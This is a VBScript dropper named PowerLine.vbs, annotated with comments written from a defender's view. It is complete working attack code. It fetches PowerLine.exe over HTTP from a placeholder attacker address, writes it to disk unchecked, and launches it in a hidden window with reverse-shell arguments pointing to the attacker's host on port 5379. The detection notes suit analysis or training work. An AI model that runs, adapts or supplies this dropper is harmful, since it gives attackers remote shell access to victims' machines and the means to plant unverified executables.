PowerLine.vbs
' Stage 1 (download): if PowerLine.exe is not already present, fetch it over
' HTTP from strUrl and write the response body to disk as PowerLine.exe.
' Defender view: a script host that creates an HTTP COM object, requests an
' .exe over plain http:// and writes it into the current directory is a
' downloader pattern worth alerting on. Nothing in this block checks a hash
' or signature of the downloaded bytes before they are written.
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
' Relative path, so the check is made against the process's current directory.
if Not fso.FileExists("PowerLine.exe") Then
Dim strUrl, StrFile
' You will need to update strUrl with the attackers IP
strUrl = "http://<attackers ipaddress>/PowerLine.exe"
StrFile = "PowerLine.exe"
' Proxy-setting constants: declared here but never referenced in this listing.
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts
Err.Clear
Set http = Nothing
' Tries four HTTP client ProgIDs in order, keeping the first that is set.
' NOTE(review): no "On Error Resume Next" appears in this listing, so a failed
' CreateObject would raise instead of leaving http as Nothing; in telemetry,
' expect the first ProgID (WinHttp.WinHttpRequest.5.1) to be the one loaded.
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")
' Third argument False makes the request synchronous: Send blocks until the
' response has arrived. The HTTP status is not inspected before the write.
http.Open "GET", strURL, False
http.Send
varByteArray = http.ResponseBody
Set http = Nothing
Set fs = CreateObject("Scripting.FileSystemObject")
' Second argument True: overwrite the target file if it already exists.
Set ts = fs.CreateTextFile(StrFile, True)
' strData and strBuffer are initialised but not used again in this listing.
strData = ""
strBuffer = ""
' Copies the response one byte at a time: Midb/Ascb read byte lngCounter + 1
' of the response and Chr writes it out through the text stream.
For lngCounter = 0 to UBound(varByteArray)
ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))
Next
ts.Close
End If
' Stage 2 (execute): start PowerLine.exe through WScript.Shell with the
' "revshell" arguments below. These lines sit after the End If of the
' download branch, so they run whether or not a download took place.
' Defender view: look for a script host (wscript.exe / cscript.exe) spawning
' PowerLine.exe with a hidden window and a command line carrying -hostip and
' -port 5379, followed by an outbound connection from that child process.
' NOTE(review): what "revshell" does inside PowerLine.exe is not visible here;
' the name and the -hostip/-port arguments suggest a reverse shell.
Dim oShell
Set oShell = CreateObject ("Wscript.Shell")
Dim strArgs
' You will need to -hostip with the attackers IP
strArgs = "PowerLine.exe revshell ""revshell -hostip <attackers ipaddress> -port 5379"""
' Run arguments: 0 = hidden window, false = do not wait for the process to exit.
oShell.Run strArgs, 0, false